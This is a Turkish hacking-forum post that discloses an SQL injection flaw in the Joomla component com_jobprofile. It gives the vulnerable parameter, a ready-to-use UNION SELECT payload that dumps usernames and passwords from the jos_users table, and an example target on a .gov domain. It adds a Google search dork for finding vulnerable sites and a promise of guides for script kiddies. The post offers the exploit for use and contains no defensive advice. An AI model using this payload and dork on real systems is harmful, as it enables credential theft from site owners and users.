folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Joomla Bileşeni Jobprofile (Com_Jobprofile) SQL Injection Açığı



Joomla Bileşeni Jobprofile (Com_Jobprofile) SQL Injection Açığı

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek

    Açığın bulunduğu yer

    http://örnek.com/[dizin]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]

     

    Açığın örnek kullanımı:

    http://açıkolansite.gov/[dizin]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--

    inurl:index.php?option=com_jobprofile

    örnek google aramasını ben bu şekil yazıyoruz siz kafanıza göre şekillendirip aram yaparsınız zaten script kiddieler için google dan en iyiy şekilde nasıl yararlanılır bunun için yazın zamanda döküğman hazırlayacağım

     


    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
Toplam Hit: 1318 Toplam Mesaj: 1